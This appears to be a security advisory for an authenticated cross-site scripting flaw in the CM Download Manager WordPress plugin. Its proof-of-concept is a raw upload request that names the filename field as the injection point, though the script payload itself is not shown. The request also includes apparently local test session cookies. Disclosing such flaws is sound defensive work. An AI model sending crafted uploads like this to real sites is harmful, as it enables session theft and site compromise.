CM Download Manager < 2.8.0 - Authenticated Cross-Site Scripting

The plugin does not properly validate and sanitise the uploaded filename, which could result in a Cross-Site Scripting issue.

PoC

Vulnerable page - ‘cmdownload/add/’ Vulnerable parameter - ‘filename’ in ‘Content-Disposition’ Header POST /cmdownload/add/ HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------297219106631036445401265881685 Content-Length: 1147 Origin: http://localhost:8081 Connection: close Referer: http://localhost:8081/cmdownload/add/ Cookie: comment_author_8dec71ede39ad9ff3b3fbc03311bdc45=eee; comment_author_email_8dec71ede39ad9ff3b3fbc03311bdc45=eee%40mail.ru; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_8dec71ede39ad9ff3b3fbc03311bdc45=test%7C1595793663%7C2B6NRI0OfyfJBfpulgmlcilvU96g754sgpLJh8GeNdA%7Ccf65a0a17f07e0e3180504eed05869ab0aa68af496aba7d26aa1848edf97fbea; wp-settings-time-1=1595621338; PHPSESSID=153061963252781ff3b221c0305d536e; wp-settings-1=editor%3Dtinymce Upgrade-Insecure-Requests: 1 -----------------------------297219106631036445401265881685 Content-Disposition: form-data; name=“CMDM_AddDownloadForm_title” test name -----------------------------297219106631036445401265881685 Content-Disposition: form-data; name=“CMDM_AddDownloadForm_package”; filename=“users.doc” Content-Type: application/msword some test data -----------------------------297219106631036445401265881685 Content-Disposition: form-data; name=“CMDM_AddDownloadForm_categories[]” 17 -----------------------------297219106631036445401265881685 Content-Disposition: form-data; name=“CMDM_AddDownloadForm_description” 222 -----------------------------297219106631036445401265881685 Content-Disposition: form-data; name=“CMDM_AddDownloadForm_screenshots” [] -----------------------------297219106631036445401265881685 Content-Disposition: form-data; name=“CMDM_AddDownloadForm_screenshots-caches” [] -----------------------------297219106631036445401265881685 Content-Disposition: form-data; name=“CMDM_AddDownloadForm_submit” Add -----------------------------297219106631036445401265881685–